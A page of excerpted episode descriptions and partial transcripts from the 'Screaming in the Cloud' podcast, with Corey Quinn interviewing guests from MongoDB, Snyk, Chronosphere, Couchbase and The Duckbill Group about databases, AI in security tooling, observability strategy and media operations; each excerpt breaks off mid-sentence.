Peder Ulander, Chief Marketing & Strategy Officer at MongoDB, joins Corey on Screaming in the Cloud to discuss how MongoDB is paving the way for innovation. Corey and Peder discuss how Peder made the decision to go from working at Amazon to MongoDB, and Peder explains how MongoDB is seeking to differentiate itself by making it easier for developers to innovate without friction. Peder also describes why he feels databases are more ubiquitous than people realize, and what it truly takes to win the hearts and minds of developers.

About Peder

Peder Ulander, the maestro of marketing mayhem at MongoDB, juggles strategies like a tech wizard on caffeine. As the Chief Marketing & Strategy Officer, he battles buzzwords, slays jargon dragons, and tends to developers with a wink. From pioneering Amazon’s cloud heyday as Director of Enterprise and Developer Solutions Marketing to leading brand insurgencies, Peder has built a legacy as the swashbuckler of software, leaving a trail of market disruptions one vibrant outfit at a time. Peder is the Scarlett Johansson of tech marketing — always looking forward, always picking the edgy roles that drive what’s next in technology.

Links Referenced:
MongoDB

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode of Screaming in the Cloud is brought to us by my friends and yours at MongoDB, and into my veritable verbal grist mill, they have sent Peder Ulander, their Chief Marketing Officer. Peder, an absolute pleasure to talk to you again.

Peder: Always good to see you, Corey.
Thanks for having me.

Corey: So, once upon a time, you worked in marketing over at AWS, and then you transitioned off to Mongo to, again, work in marketing. Imagine that. Almost like there’s a narrative arc to your career. A lot of things change when you change companies, but before we dive into things, I just want to call out that you’re a bit of an aberration in that every single person that I have spoken to who has worked within your org has nothing but good things to say about you, which means you are incredibly effective at silencing dissent. Good work.

Peder: Or it just shows that I’m a good marketer and make sure that we paint the right picture that the world needs to see.

Corey: Exactly. “Do you have any proof of you being a great person to work for?” “No, just word of mouth,” and everyone, “Ah, that’s how marketing works.”

Peder: Exactly. See, I’m glad you picked that up somewhere.

Corey: So, let’s dive into that a little bit. Why would you leave AWS to go work at Mongo? Again, my usual snark and sarcasm would come up with a half dozen different answers, each more offensive than the last. Let’s be serious for a second. At AWS, there’s an incredibly powerful engine that drives so much stuff, and the breadth is enormous.

MongoDB, despite an increasingly broad catalog of offerings, is nowhere near that level of just universal applicability. Your product strategy is not a Post-It note with the word ‘yes’ written on it. There are things that you do across the board, but they all revolve around databases.

Peder: Yeah. So, going back prior to MongoDB, I think you know, at AWS, I was across a number of different things, from the developer ecosystem, to the enterprise transformation, to the open-source work, et cetera, et cetera.
And being privy to how customers were adopting technology to change their business, or change the experiences that they were delivering to their customers, or increase the value of the applications that they built, you know, there was a common thread of something that fundamentally needed to change. And I like to go back to just the evolution of tech in that sense. We could talk about going from physical on-prem systems to now we’re distributed in the cloud. You could talk about application constructs that started as big fat monolithic apps that moved to virtual, then microservices, and now functions.

Or you think about networking: we’ve gone from fixed wire line, to network edge, and cellular, and what have you. All of the tech stack has changed with the exception of one layer, and that’s the data layer. And I think for the last 20 years, what’s been in place has worked okay, but we’re now meeting this new level of scale, this new level of reach, where the old systems are not what the new systems, or the new experiences, are going to be built on. And as I was approached by MongoDB, I kind of sat back and said, “You know, I’m super happy at AWS. I love the learning, I love the people, I love the space I was in, but if I were to put my crystal ball together”—here’s a Bezos statement of looking around corners—“the data space is probably one of the biggest spaces ripe for disruption and opportunity, and I think Mongo is in an incredible position to go take advantage of that.”

Corey: I mean, there’s an easy number of jokes to make about AmazonBasics MongoDB, which is my disparaging name for their DocumentDB first-party offering. And for a time, it really felt like AWS’s perspective toward its partners was one of outright hostility, if not antagonism. But that narrative no longer holds true in 2023. There’s been a definite shift.
And to be direct, part of the reason that I believe that is the things you have said, both personally and professionally, in your role as CMO of Mongo that have caused me to reevaluate this because despite all of your faults—a counted list of which I can provide you after the show—

Peder: [laugh].

Corey: You do not say things that you do not believe to be true.

Peder: Correct.

Corey: So, something has changed. What is it?

Peder: So, I think there’s an element of coopetition, right? So, I would go as far as to say the media loved to sensationalize—actually, even the venture community loved to sensationalize—the screen-scraping, stripping of open-source communities that Amazon represented a number of years ago. The reality was their intent was pretty simple. They built an incredibly amazing IT stack, and they wanted to run whatever applications and software were important to their customers. And when you think about that, the majority of systems today, people want to run open-source because it removes friction, it removes cost, it enables them to go do cool new things, and be on the bleeding edge of technology.

And Amazon did their best to work with the top open-source projects in the world to make them available to their customers. Now, for the commercial vendors that are leaning into this space, that obviously does present itself as a threat, right? And we’ve seen that along a number of the cohorts of whether you want to call it single-vendor open-source or companies that have a heavy, vested interest in seeing the success of their enterprise stack match the success of the open-source stack. And that’s, I think, where media, analysts, venture, all kind of jumped on the bandwagon of not really, kind of, painting that bigger picture for the future. I think today when I look at Amazon—and candidly, it’ll be any of the hyperscalers; they all have a clone of our database—it’s an entry point.
They’re running just the raw open-source operational database capabilities that we have in our community edition and making that available to customers.

We believe there’s a bigger value in going beyond just that database and introducing, you know, anything from the distributed zones to what we do around vector search to what we do around stream processing, and encryption, and all of these advanced features and capabilities that enable our customers to scale rapidly on our platform. And the dependency on delivering that is with the hyperscalers, so that’s where that coopetition comes in, and that becomes really important for us when we’re casting our net to engage with some of the world’s largest customers out there. But interestingly enough, we become a big drag of services for an AWS or any of the other hyperscalers out there, meaning that for every dollar that goes to a MongoDB, there’s, you know, three, five, ten dollars that goes to these hyperscalers. And so, they’re very active in working with us to ensure that, you know, we have fair and competing offers in the marketplace, that they’re promoting us through their own marketplace as well as their own channels, and that we’re working together to further the success of our customers.

Corey: When you take a look at the exciting things that are happening at the data layer—because you mentioned that we haven’t really seen significant innovation in that space for a while—one of the things that I see happening is with the rise of Generative AI, which requires very special math that can only be handled by very special types of computers.
I’m seeing at least a temporary inversion in what has traditionally been thought of as data gravity, whereas it’s easier to move compute close to the data, but in this case, since the compute only lives in the, um, sparkling us-east-1 regions of Virginia, otherwise, it’s just generic, sparkling expensive computers, great, you have to effectively move the mountain to Mohammed, so to speak. So, in that context, what else is happening that is driving innovation in the data space right now?

Peder: Yeah, yeah. I love your analogy of move the mountain to Mohammed because that’s actually how we look at the opportunity in the whole Generative AI movement. There are a lot of tools and capabilities out there, whether we’re looking at code generation tools, LLM modeling vendors, some of the other vector database companies that are out there, and they’re all built on the premise of
Randall Degges, Head of Developer Relations & Community at Snyk, joins Corey on Screaming in the Cloud to discuss Snyk’s innovative AI strategy and why developers don’t need to be afraid of security. Randall explains the difference between Large Language Models and Symbolic AI, and how combining those two approaches creates more accurate security tooling. Corey and Randall also discuss the FUD approach to selling security tools, and Randall expands on why Snyk doesn’t take that approach. Randall also shares some background on how he went from being a happy Snyk user to a full-time Snyk employee.

About Randall

Randall runs Developer Relations & Community at Snyk, where he works on security research, development, and education. In his spare time, Randall writes articles and gives talks advocating for security best practices. Randall also builds and contributes to various open-source security tools.

Randall’s realms of expertise include Python, JavaScript, and Go development, web security, cryptography, and infrastructure security. Randall has been writing software for over 20 years and has built a number of popular API services and open-source tools.

Links Referenced:
Snyk
Snyk blog

Transcript

Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn, and this featured guest episode is brought to us by our friends at Snyk. Also brought to us by our friends at Snyk is one of our friends at Snyk, specifically Randall Degges, their Head of Developer Relations and Community. Randall, thank you for joining me.

Randall: Hey, what’s up, Corey? Yeah, thanks for having me on the show, man.
Looking forward to talking about some fun security stuff today.

Corey: It’s been a while since I got to really talk about a security-centric thing on this show, at least in order of recordings. I don’t know if the one right before this is a security thing; things happen on the back-end that I’m blissfully unaware of. But it seems the theme lately has been a lot around generative AI, so I’m going to start off by basically putting you in the hot seat. Because when you pull up a company’s website these days, the odds are terrific that they’re going to have completely repositioned absolutely everything that they do in the context of generative AI. It’s like, “We’re a generative AI company.” It’s like, “That’s great.” Historically, I have been a paying customer of Snyk so that it does security stuff, so if you’re now a generative AI company, who do I use for the security platform thing that I was depending upon? You have not done that. First, good work. Secondly, why haven’t you done that?

Randall: Great question. Also, you said a moment ago that LLMs are very interesting, or there’s a lot of hype around it. Understatement of the last year, for sure [laugh].

Corey: Oh, my God, it has gotten brutal.

Randall: I don’t know how many billions of dollars have been dumped into LLMs in the last 12 months, but I’m sure it’s a very high number.

Corey: I have a sneaking suspicion that the largest models cost at least a billion each to train, just based upon—at least retail price—based upon the simple economics of how long it takes to do these things, and how expensive that particular flavor of compute is. And the technology is magic. It is magic in a box, and I see that, but finding ways that it applies in different ways is taking some time. But that’s not stopping the hype beasts.
A lot of the same terrible people who were relentlessly pushing crypto have now pivoted to relentlessly pushing generative AI, presumably because they’re working through Nvidia’s street team, or their referral program, or whatever it is. Doesn’t matter what the rest of us do, as long as we’re burning GPU cycles on it. And I want to distance myself from that exciting level of boosterism. But it’s also magic.

Randall: Yeah [laugh]. Well, let’s just talk about AI in security for a moment and answer your previous question. So, what’s happening in the space, where is all the hype going, and what is Snyk doing around there? So, quite frankly—and I’m sure a lot of people on your show say the same thing—but Snyk isn’t new into, like, the AI space. It’s been a fundamental part of our platform for many years now.

So, for those of you listening who have no idea what the heck Snyk is, and you’re like, “Why are we talking about this,” Snyk is essentially a developer security company, and the core of what we do is two things. The first thing is we help scan your code, your dependencies, your containers, all the different parts of your application, and detect vulnerabilities. That’s the first part. The second thing we do is we help fix those vulnerabilities. So, detection and remediation. Those are the two components of any good security tool or security company.

And in our particular case, we’re very focused on developers because our whole product is really based on your application and your application security, not infrastructure and other things like this. So, with that being said, what are we doing at a high level with LLMs? Well, if you think about AI as, like, a broad spectrum, you have a lot of different technologies behind the scenes that people refer to as AI. You have lots of these large language models, which are generating text based on inputs. You also have symbolic AI, which has been around for a very long time and which is very domain specific.
It’s like creating specific rules and helping do pattern detection amongst things.

And those two different types of applied AI, let’s say—we have large language models and symbolic AI—are the two main things that have been happening in industry for the last, you know, tens of years, really, with LLMs being the new kid on the block. So, when we’re talking about security, what’s important to know about just those two underlying technologies? Well, the first thing is that large language models, as I’m sure everyone listening to this knows, are really good at predicting things based on a big training set of data. That’s why companies like OpenAI and their ChatGPT tool have become so popular because they’ve gone out and crawled vast portions of the internet, downloaded tons of data, classified it, and then trained their models on top of this data so that they can help predict the things that people are putting into chat. And that’s why they’re so interesting, and powerful, and there’s all these cool use cases popping up with them.

However, the downside of LLMs is because they’re just using a bunch of training data behind the scenes, there’s a ton of room for things to be wrong. Training datasets aren’t perfect, they’re coming from a ton of places, and even if they were perfect, there’s still the likelihood that output generated from a statistical model isn’t going to be accurate, which is the whole concept of hallucinations.

Corey: Right. I wound up remarking on the livestream for GitHub Universe a week or two ago that the S in AI stood for security. One of the problems I’ve seen with it is that it can generate a very plausible looking IAM policy if you ask it to, but it doesn’t actually do what you think it would if you go ahead and actually use it.
I think that it’s still squarely in the realm of, it’s great at creativity, it’s great at surface level knowledge, but for anything important, you really want someone who knows what they’re doing to take a look at it and say, “Slow your roll there, Hasty Pudding.”

Randall: A hundred percent. And when we’re talking about LLMs, I mean, you’re right. Security isn’t really what they’re designed to do, first of all [laugh]. Like, they’re designed to predict things based on statistics, which is not a security concept. But secondly, another important thing to note is, when you’re talking about using LLMs in general, there’s so many tricks and techniques and things you can do to improve accuracy, like, for example, having a ton of context, or doing few-shot learning techniques, where you prompt it and give it examples of the questions and answers that you’re looking for, which can give you a slight competitive edge there in terms of reducing hallucinations and false information.

But fundamentally, LLMs will always have a problem with hallucinations and getting things wrong. So, that brings us to what we mentioned before: symbolic AI and what the differences are there. Well, symbolic AI is a completely different approach. You’re not taking huge training sets and using machine learning to build statistical models. It’s very different. You’re creating rules, and you’re parsing very specific domain information to generate things that are highly accurate, although those models will fail when applied to general-purpose things, unlike large language models.

So, what does that mean? You have these two different types of AI that people are using. You have symbolic AI, which is very specific and requires a lot of expertise to create, then you have LLMs, which take a lot of expertise to create as well, but are very broad and general purpose and have a capability to be wrong.
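The contrast Randall draws can be made concrete with a toy sketch. Everything below is invented for illustration (the single regex “rule” for hardcoded credentials is hypothetical, and nothing like the curated rule sets Snyk or any real scanner ships), but it shows why the symbolic side is precise but narrow: the rule fires only on exactly what it was written to catch, deterministically, with no statistics involved.

```python
import re

# Symbolic AI in miniature: one hand-written, domain-specific rule.
# (Hypothetical pattern for illustration; real scanners use large curated rule sets.)
HARDCODED_SECRET = re.compile(
    r'(password|api_key)\s*=\s*["\'][^"\']+["\']', re.IGNORECASE
)

def symbolic_scan(source: str) -> list[str]:
    """Return each line that matches the rule. The result is exactly
    reproducible, but the rule knows nothing outside its own pattern."""
    return [line.strip() for line in source.splitlines()
            if HARDCODED_SECRET.search(line)]

sample = """
db_host = "example.internal"
password = "hunter2"
timeout = 30
"""

print(symbolic_scan(sample))  # ['password = "hunter2"']
```

An LLM-based reviewer, by contrast, might flag suspicious code that no rule anticipated, but can also hallucinate findings; the hybrid idea Randall goes on to describe pairs the two so that precise rules anchor the model’s breadth.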
Snyk’s approach is, we take both of those concepts, and we use them together to get the best of both worlds. And we can talk a little bit about that, but I think fundamentally, one of the things that separates Snyk from a lot of other companies in the space is we’re just trying to do whatever the best technical solution is to solve the problem, and I think we found that with our hybrid approach.

Corey: I think that there is a reasonable distrust of AI when it comes to security. I
Rachel Dines, Head of Product and Technical Marketing at Chronosphere, joins Corey on Screaming in the Cloud to discuss why creating a cloud-native observability strategy is so critical, and the challenges that come with both defining and accomplishing that strategy to fit your current and future observability needs. Rachel explains how Chronosphere is taking an open-source approach to observability, and why it’s more important than ever to acknowledge that the stakes and costs are much higher when it comes to observability in the cloud.

About Rachel

Rachel leads product and technical marketing for Chronosphere. Previously, Rachel wore lots of marketing hats at CloudHealth (acquired by VMware), and before that, she led product marketing for cloud-integrated storage at NetApp. She also spent many years as an analyst at Forrester Research. Outside of work, Rachel tries to keep up with her young son and hyperactive dog, and when she has time, enjoys crafting and eating out at local restaurants in Boston, where she’s based.

Links Referenced:
Chronosphere
LinkedIn

Transcript

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Today’s featured guest episode is brought to us by our friends at Chronosphere, and they have also brought us Rachel Dines, their Head of Product and Solutions Marketing. Rachel, great to talk to you again.

Rachel: Hi, Corey. Yeah, great to talk to you, too.

Corey: Watching your trajectory has been really interesting, just because starting off, when we first started, I guess, learning who each other were, you were working at CloudHealth, which has since become VMware.
And I was trying to figure out, huh, the cloud runs on money. How about that? It feels like it was a thousand years ago, but neither one of us is quite that old.

Rachel: It does feel like several lifetimes ago. You were just this snarky guy with a few followers on Twitter, and I was trying to figure out what you were doing mucking around with my customers [laugh]. Then [laugh] we kind of both figured out what we’re doing, right?

Corey: So, speaking of that iterative process, today, you are at Chronosphere, which is an observability company. We would have called it a monitoring company five years ago, but now that’s become an insult after the observability war dust has settled. So, I want to talk to you about something that I’ve been kicking around for a while because I feel like there’s a gap somewhere. Let’s say that I build a crappy web app—because all of my web apps inherently are crappy—and it makes money through some mystical form of alchemy. And I have a bunch of users, and I eventually realize, huh, I should probably have a better observability story than waiting for the phone to ring and a customer telling me it’s broken.

So, I start instrumenting various aspects of it that seem to make sense. Maybe I go too low level, like looking at all the disks on every server to tell me if they’re getting full or not, like they’re ancient servers. Maybe I just have a Pingdom equivalent of, is the website up enough to respond to a packet? And as I wind up experiencing different failure modes and getting yelled at by different constituencies—in my own career trajectory, my own boss—you start instrumenting for all those different kinds of breakages, you start aggregating the logs somewhere, and the volume gets bigger and bigger with time. But it feels like it’s sort of a reactive process as you stumble through that entire environment.

And I know it’s not just me because I’ve seen this unfold in similar ways in a bunch of different companies.
It feels to me, very strongly, like it is something that happens to you, rather than something you set about from day one with a strategy in mind. What’s your take on an effective way to think about strategy when it comes to observability?

Rachel: You just nailed it. That’s exactly the kind of progression that we so often see. And that’s what I really was excited to talk with you about today—

Corey: Oh, thank God. I was worried for a minute there that you’d be like, “What the hell are you talking about? Are you just, like, some sort of crap engineer?” And, “Yes, but it’s mean of you to say it.” But yeah, what I’m trying to figure out is, is there some magic that I just was never connecting? Because it always feels like you’re in trouble because the site’s always broken, and oh, like, if the disk fills up, yeah, oh, now we’re going to start monitoring to make sure the disk doesn’t fill up. Then you wind up getting barraged with alerts, and no one wins, and it’s an uncomfortable period of time.

Rachel: Uncomfortable period of time. That is one very polite way to put it. I mean, I will say, it is very rare to find a company that actually sits down and thinks, “This is our observability strategy. This is what we want to get out of observability.” Like, you can think about a strategy in, like, the old school sense, and you know, as an industry analyst, so I’m going to have to go back to, like, my roots at Forrester with thinking about, like, the people, and the process, and the technology.

But really what the bigger component here is, like, what’s the business impact? What do you want to get out of your observability platform? What are you trying to achieve? And a lot of the time, people have thought, “Oh, observability strategy. Great, I’m just going to buy a tool. That’s it. Like, that’s my strategy.”

And I hate to break it to you, but buying tools is not a strategy. I’m not going to say, like, buy this tool.
I’m not even going to say, “Buy Chronosphere.” That’s not a strategy. Well, you should buy Chronosphere. But that’s not a strategy.

Corey: Of course. I’m going to throw the money by the wheelbarrow at various observability vendors, and hope it solves my problem. But if that solved the problem—I’ve got to be direct—I’ve never spoken to those customers.

Rachel: Exactly. I mean, that’s why this space is such a great one to come in and be very disruptive in. And I think, back in the days when we were running in data centers, maybe even before virtual machines, you could probably get away with not having a monitoring strategy—I’m not going to call it observability; it’s not what we called it back then—you could get away with not having a strategy because what was the worst that was going to happen, right? It wasn’t like there was an infinite amount that your monitoring bill could be, or an infinite amount that your customer impact could be. Like, you’re playing the penny slots, right?

We’re not on the penny slots anymore. We’re at the $50 craps table, and it’s Las Vegas, and if you lose the game, you’re going to have to run down the street without your shirt. Like, the game and the stakes have changed, and we’re still pretending like we’re playing penny slots, and we’re not anymore.

Corey: That’s a good way of framing it. I mean, I still remember some of my biggest observability challenges were building highly available rsyslog clusters so that you could bounce a member and not lose any log data because some of that was transactionally important. And we’ve gone beyond that to a stupendous degree, but it still feels like you don’t wind up building this into the application from day one. More’s the pity because if you did, and did that intelligently, that opens up a whole world of possibilities.
I dream of that changing, where one day, whenever you start to build an app, oh, we just push the button and automatically instrument it with OTel, so you instrument the thing once, everywhere it makes sense to do it, and then you can do your vendor selection and, as you said, those decisions later in time. But these days, we’re not there.

Rachel: Well, I mean, and there’s also the question of just the legacy environment and the tech debt. Even if you wanted to, the—actually, I was having a beer yesterday with a friend who’s a VP of Engineering, and he’s got his new environment that they’re building with observability instrumented from the start. How beautiful. They’ve got OTel, they’re going to have tracing. And then he’s got his legacy environment, which is a hot mess.

So, you know, there’s always going to be this bridge of the old and the new. But this is where it comes back to, no matter where you’re at, you can stop and think, like, “What are we doing and why?” What is the cost of this? And not just cost in dollars, which I know you and I could talk about very deeply for a long period of time, but, like, the opportunity costs. Developers are working on stuff that—they could be working on something that’s more valuable.

Or, like, the cost of making people work round the clock, trying to troubleshoot issues when there could be an easier way. So, I think it’s, like, stepping back and thinking about cost in terms of dollars and cents, time, opportunity, and then also impact, and starting to make some decisions about what you’re going to do in the future that’s different. Once again, you might be stuck with some legacy stuff that you can’t really change that much, but [laugh] you got to be realistic about where you’re at.

Corey: I think that that is a… it’s a hard lesson to be very direct, in that companies need to learn it the hard way, for better or worse.
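The “instrument once, pick the vendor later” idea Corey describes is, roughly, what OpenTelemetry’s split between an instrumentation API and pluggable exporters is for. A self-contained toy sketch of that decoupling (the `Tracer` and exporter here are invented stand-ins, not the actual OTel API):

```python
import time
from typing import Callable, List, Tuple

# A "span" is just (name, seconds); an exporter is anything that ships spans.
Span = Tuple[str, float]
Exporter = Callable[[List[Span]], None]

class Tracer:
    """Instrument once; the exporter (the 'vendor') is swappable later."""
    def __init__(self, exporter: Exporter) -> None:
        self.exporter = exporter
        self._spans: List[Span] = []

    def span(self, name: str):
        tracer = self
        class _Ctx:
            def __enter__(self):
                self._start = time.perf_counter()
            def __exit__(self, *exc):
                tracer._spans.append((name, time.perf_counter() - self._start))
        return _Ctx()

    def flush(self) -> None:
        self.exporter(self._spans)

# "Vendor" selection happens here, not in the application code below.
collected: List[Span] = []
tracer = Tracer(exporter=collected.extend)

with tracer.span("handle_request"):
    time.sleep(0.01)  # the app doing work
tracer.flush()

print(collected[0][0])  # handle_request
```

Swapping `collected.extend` for a callable that ships spans to one backend or another changes the vendor without touching the instrumented application code, which is the deferred decision Corey is dreaming about.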
Honestly, this is one of the things that I always noticed in startup land, where you had a whole bunch of, frankly, relatively early-career engineers in their early-20s, if not younger. But then the ops person was always significantly older because the thing you actually want to hear from your ops person, regardless of how you slice it, is, “Oh, yeah, I’ve seen thi
Jeff Morris, VP of Product & Solutions Marketing at Couchbase, joins Corey on Screaming in the Cloud to discuss Couchbase’s new columnar data store functionality, specific use cases for columnar data stores, and why AI gets better when it communicates with a cleaner pool of data. Jeff shares how businesses like Domino’s and United Airlines could create hyper-personalized experiences for their customers by utilizing more responsive databases. Jeff dives into the linked future of AI and data, and Corey learns about Couchbase’s plans for the re:Invent conference. If you’re attending re:Invent, you can visit Couchbase at booth 1095.

About Jeff

Jeff Morris is VP Product & Solutions Marketing at Couchbase (NASDAQ: BASE), a cloud database platform company that 30% of the Fortune 100 depend on.

Links Referenced:
Couchbase

Transcript

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode of Screaming in the Cloud is brought to us by our friends at Couchbase. Also brought to us by Couchbase is today’s victim, for lack of a better term. Jeff Morris is their VP of Product and Solutions Marketing. Jeff, thank you for joining me.

Jeff: Thanks for having me, Corey, even though I guess I paid for it.

Corey: Exactly. It’s always great to say thank you when people give you things.
I learned this from a very early age, and the only people who didn’t were rude children and turned into worse adults.

Jeff: Exactly.

Corey: So, you are effectively announcing something new today, and I always get worried when a database company says that because sometimes it’s a license that is going to upset people, sometimes it’s dyed so deep in the wool of generative AI that, “Oh, we’re now supporting vectors or whatnot.” Well, most of us don’t know what that means.

Jeff: Right.

Corey: Fortunately, I don’t believe that’s what you’re doing today. What have you got for us?

Jeff: So, you’re right. It’s—well, what I’m doing is, we’re announcing new stuff inside of Couchbase and helping Couchbase expand its market footprint, but we’re not really moving away from our sweet spot, either, right? We like building—or being the database platform underneath applications. So, push us on the operational side of the operational versus analytic, kind of, database divide. But we are announcing a columnar data store inside of the Couchbase platform so that we can build bigger, better, stronger analytic functionality to feed the applications that we’re supporting with our customers.

Corey: Now, I feel like I should ask a question around what a columnar data store is because my first encounter with the term was when I had a very early client for AWS bill optimization when I was doing this independently, and I was asking them the… polite question of, “Why do you have 283 billion objects in a single S3 bucket? That is atypical and kind of terrifying.” And their answer was, “Oh, we built our own columnar data store on top of S3. This might not have been the best approach.” It’s like, “I’m going to stop you there.
With no further information, I can almost guarantee you that it was not.” But what is a columnar data store?Jeff: Well, let’s start with this: everybody loves more data and everybody loves to count more things, right? But a columnar data store allows you to expedite the kind of question that you ask of the data itself by not having to look at every single row of the data while you go through it. You can say, if you know you’re only looking for data that’s inside of California, you just look at the column value of find me everything in California and then I’ll pick all of those records to analyze. So, it gives you a faster way to go through the data while you’re trying to gather it up and perform aggregations against it.Corey: It seems like it’s one of those, “Well, that doesn’t sound hard,” type of things, when you’re thinking about it the way that I do, in terms of a database being more or less a medium to large size Excel spreadsheet. But I have it on good faith from all the customer environments I’ve worked with that no, no, there are data stores that span even larger than that, which is, you know, one of those sad realities of the world. And everything at scale begins to be a heck of a lot harder. I’ve seen some of the value that this stuff offers and I can definitely understand a few different workloads in which case that’s going to be super handy. What are you targeting specifically? Or is this one of those areas where you’re going to learn from your customers?Jeff: Well, we’ve had analytic functionality inside the platform. It just, at the size and scale customers actually wanted to roam through the data, we weren’t supporting that that much. So, we’ll expand that particular footprint, it’ll give us better integration capabilities with external systems, or better access to things in your bucket. But the use case problem is, I think, going to be driven by what new modern application requirements are going to be. 
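To make the row-versus-column contrast concrete, here is a minimal sketch in plain Python with made-up data (nothing Couchbase-specific; real columnar engines add compression, indexes, and vectorized scans on top of this basic idea):

```python
# Toy contrast between a row layout and a columnar layout for one query:
# "find all records where state == 'California'".

rows = [
    {"name": "Ann",  "state": "California", "total": 120},
    {"name": "Bob",  "state": "Oregon",     "total": 80},
    {"name": "Cruz", "state": "California", "total": 45},
]

# Row layout: every field of every record is touched during the scan.
row_result = [r for r in rows if r["state"] == "California"]

# Columnar layout: the same data stored as one list per column.
columns = {
    "name":  ["Ann", "Bob", "Cruz"],
    "state": ["California", "Oregon", "California"],
    "total": [120, 80, 45],
}

# Only the "state" column is read to find matching positions...
matches = [i for i, s in enumerate(columns["state"]) if s == "California"]
# ...then only the columns the query needs are materialized for those rows.
col_result = [columns["total"][i] for i in matches]

print(row_result)  # the two matching records, fields and all
print(col_result)  # just the totals to aggregate: [120, 45]
```

Both layouts answer the same question; the columnar one simply never reads the `name` data at all, which is where the speedup comes from at scale.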
You’re going to need, we call it hyper-personalization because we tend to cater to B2C-style applications, things with a lot of account profiles built into them.So, you look at account profile, and you’re like, “Oh, well Jeff likes blue, so sell him blue stuff.” And that’s a great current level personalization, but with a new analytic engine against this, you can maybe start aggregating all the inventory information that you might have of all the blue stuff that you want to sell me and do that in real-time, so I’m getting better recommendations, better offers as I’m shopping on your site or looking at my phone and, you know, looking for the next thing I want to buy.Corey: I’m sure there’s massive amounts of work that goes into these hyper-personalization stories. The problem is that the only time they really rise to our notice is when they fail hilariously. Like, you just bought a TV, would you like to buy another? Now statistically, you are likelier to buy a second TV right after you buy one, but for someone who just, “Well, I’m replacing my living room TV after ten years,” it feels ridiculous. Or when you buy a whole bunch of nails and they don’t suggest, “Would you like to also perhaps buy a hammer?”It’s one of those areas where it just seems like a human putting thought into this could make some sense. But I’ve seen some of the stuff that can come out of systems like this and it can be incredible. I also personally tend to bias towards use cases that are less, here’s how to convince you to buy more things and start aiming in a bunch of other different directions where it starts meeting emerging use cases or changing situations rapidly, more rapidly than a human can in some cases. The world has, for better or worse, gotten an awful lot faster over the last few decades.Jeff: Yeah. And think of it in terms of how responsive can I be at any given moment. And so, let’s pick on one of the more recent interesting failures that has popped up. 
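The “blue stuff” aggregation Jeff describes above can be sketched in a few lines of plain Python. The profile and inventory data here are hypothetical, and this is not any particular Couchbase API, just the shape of the computation:

```python
# Hypothetical account profile and inventory; in a real system these would
# come from the operational store and the analytic (columnar) side.
profile = {"user": "Jeff", "favorite_color": "blue"}

inventory = [
    {"sku": "SHIRT-1", "color": "blue", "stock": 14, "price": 25.0},
    {"sku": "MUG-7",   "color": "red",  "stock": 3,  "price": 9.0},
    {"sku": "HAT-2",   "color": "blue", "stock": 0,  "price": 19.0},
    {"sku": "SOCK-9",  "color": "blue", "stock": 40, "price": 7.0},
]

# Aggregate in-stock items matching the profile, cheapest first, so the
# next page view can show offers that can actually be fulfilled.
offers = sorted(
    (item for item in inventory
     if item["color"] == profile["favorite_color"] and item["stock"] > 0),
    key=lambda item: item["price"],
)

print([o["sku"] for o in offers])  # SOCK-9 first, then SHIRT-1
```

Note the out-of-stock blue hat is filtered out; the point of doing this aggregation in near real time is exactly that stock and preferences both change while the customer is browsing.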
I’m a Giants fan, San Francisco Giants fan, so I’ll pick on the Dodgers. The Dodgers during the baseball playoffs, Clayton Kershaw—three-time MVP, Cy Young Award winner, great, great pitcher—had a first-inning meltdown of colossal magnitude: gave up 11 runs in the first inning to the Diamondbacks.Well, my customer Domino’s Pizza could end up—well, let’s shift the focus of our marketing. We—you know, the Dodgers are the best team in baseball this year in the National League—let’s focus our attention there, but with that meltdown, let’s pivot to Arizona and focus on our market in Phoenix. And they could do that within minutes or seconds, even, with the kinds of capabilities that we’re coming up with here so that they can make better offers to that new environment and also do the decision intelligence behind it. Like, do I have enough dough to make a bigger offer in that big market? Do I have enough drivers or do I have to go and spin out and get one of the other food delivery folks—UberEats, or something like that—to jump on board with me and partner up on this kind of system?It’s that responsiveness in real, real-time, right, that’s always been kind of the conundrum between applications and analytics. You get an analytic insight, but it takes you an hour or a day to incorporate that into what the application is doing. This is intended to make all of that stuff go faster. And of course, when we start to talk about things in AI, right, AI is going to expect real-time responsiveness as best you can make it.Corey: I figure we have to talk about AI. That is a technology that has absolutely sprung to the absolute peak of the hype curve over the past year. OpenAI released Chat-Gippity, either late last year or early this year and suddenly every company seems to be falling all over itself to rebrand itself as an AI company, where, “We’ve been working on this for decades,” they say, right before they announce something that very clearly was crash-developed in six months. 
And every company is trying to drape themselves in the mantle of AI. And I don’t want to sound like I’m a doubter here. I’m like most fans; I see an awful lot of value here. But I am curious to get your take on what do you think is real and what do you think is not in the current hype environment.Jeff: So yeah, I love that. I think there’s a number of things that are, you know, are real is, it’s not going away. It is going to continue to evolve and get better and better and better. One of my analyst friends came up with the notion that the exercise of generative AI, it’s imprecise, so it gives you similarit
Jeremy Tangren, Director of Media Operations at The Duckbill Group, joins Corey on Screaming in the Cloud to discuss how he went from being a Project Manager in IT to running Media Operations at a cloud costs consultancy. Jeremy provides insight into how his background as a Project Manager has helped him tackle everything that’s necessary in a media production environment, as well as what it was like to shift from a career on the IT side to working at a company that is purely cloud-focused. Corey and Jeremy also discuss the coordination of large events like re:Invent, and what attendance is really like when you’re producing the highlight reels that other people get to watch from the comfort of their own homes. About JeremyWith over 15 years of experience in big tech, Jeremy brings a unique perspective to The Duckbill Group and its Media Team. Jeremy handles all things Media Operations. From organizing the team and projects to making sure publications go out on time, Jeremy does a bit of everything!Links Referenced: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Today’s guest is one of those behind-the-scenes type of people who generally doesn’t emerge much into the public eye. Now, that’s a weird thing to say about most folks, except in this case, I know for a fact that it’s true because that’s kind of how his job was designed. Jeremy Tangren is the Director of Media Operations here at The Duckbill Group. Jeremy, thank you for letting me drag you into the 